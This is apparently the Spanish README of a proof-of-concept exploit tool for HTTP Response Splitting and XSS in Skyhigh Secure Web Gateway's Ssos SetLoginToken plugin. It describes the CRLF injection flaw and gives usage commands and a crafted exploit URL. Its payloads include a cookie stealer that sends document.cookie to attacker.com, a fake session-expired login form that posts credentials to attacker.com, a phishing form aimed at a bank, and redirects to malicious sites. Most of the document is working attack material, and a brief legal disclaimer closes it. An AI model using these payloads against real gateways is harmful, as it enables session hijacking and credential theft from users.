
Secure Web Gateway 10.2.11 - Secuencias de comandos entre sitios (XSS)
██████╗ ██████╗ ████████╗███████╗
██╔═████╗██╔══██╗╚══██╔══╝██╔════╝
██║██╔██║██████╔╝ ██║ ███████╗
████╔╝██║██╔═══╝ ██║ ╚════██║
╚██████╔╝██║ ██║ ███████║
╚═════╝ ╚═╝ ╚═╝ ╚══════╝
por 0PTS
Prueba de concepto para la vulnerabilidad HTTP Response Splitting en Skyhigh Secure Web Gateway (anteriormente McAfee Web Gateway).
Vulnerabilidad crítica de HTTP Response Splitting en Skyhigh Secure Web Gateway que permite ejecutar remotamente ataques XSS mediante la inyección de código HTML/JavaScript arbitrario.
La vulnerabilidad se encuentra en el plugin «Ssos» (acción SetLoginToken), que procesa incorrectamente los parámetros de URL:
Dado que los caracteres de nueva línea (\r\n / %0d%0a) no se escapan, el atacante puede:
Content-Type y Content-LengthEl navegador ignora el resto del contenido de la respuesta después de un Content-Length correctamente formado, lo que permite sustituir por completo el contenido mostrado.
python explot.py
# XSS básico
python explot.py -d example.com -p "<script>alert(document.domain)</script>"
# Redirección
python explot.py -d target.com -p '<meta http-equiv="refresh" content="0;url=https://evil.com/">'
# Formulario de phishing
python explot.py -d bank.com -p '<form action="https://evil.com/steal"><input name="pass" placeholder="Password"><button>Login</button></form>'
# Solo URL (modo silencioso)
python explot.py -d example.com -p "<script>alert(1)</script>" -q
-d, --domain Dominio objetivo (por defecto: google.com)
-x, --prefix Prefijo de la ruta URL (por defecto: SWG internal path)
-p, --payload Payload HTML/JavaScript
-q, --quiet Modo silencioso - solo URL
-v, --version Versión del script
-h, --help Ayuda
<script>fetch('https://attacker.com/log?c='+document.cookie)</script>
<html>
<body style="font-family:Arial">
<h2>Session Expired - Please Login Again</h2>
<form action="https://attacker.com/phish" method="POST">
<input type="text" name="user" placeholder="Username"><br>
<input type="password" name="pass" placeholder="Password"><br>
<button>Login</button>
</form>
</body>
</html>
<meta http-equiv="refresh" content="0;url=https://malicious-site.com/">
██████╗ ██████╗ ████████╗███████╗
██╔═████╗██╔══██╗╚══██╔══╝██╔════╝
██║██╔██║██████╔╝ ██║ ███████╗
████╔╝██║██╔═══╝ ██║ ╚════██║
╚██████╔╝██║ ██║ ███████║
╚═════╝ ╚═╝ ╚═╝ ╚══════╝
[+] Target Domain: example.com
[+] Payload Length: 43 bytes
[+] URL Length: 234 chars
[+] Generated URL:
http://example.com/mwg-internal/de5fs23hu73ds/plugin?target=Ssos&action=SetLoginToken&v=1&c=1&p=p%0D%0AContent-Type%3A%20text%2Fhtml%3Bcharset%3Dutf-8%0D%0AContent-Length%3A%2043%0D%0A%0D%0A%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/mwg-internal/*⚠️ ADVERTENCIA: Esta herramienta está destinada exclusivamente a:
El uso contra sistemas sin el permiso explícito del propietario es ilegal.
██████╗ ██████╗ ████████╗███████╗
██╔═████╗██╔══██╗╚══██╔══╝██╔════╝
██║██╔██║██████╔╝ ██║ ███████╗
████╔╝██║██╔═══╝ ██║ ╚════██║
╚██████╔╝██║ ██║ ███████║
╚═════╝ ╚═╝ ╚═╝ ╚══════╝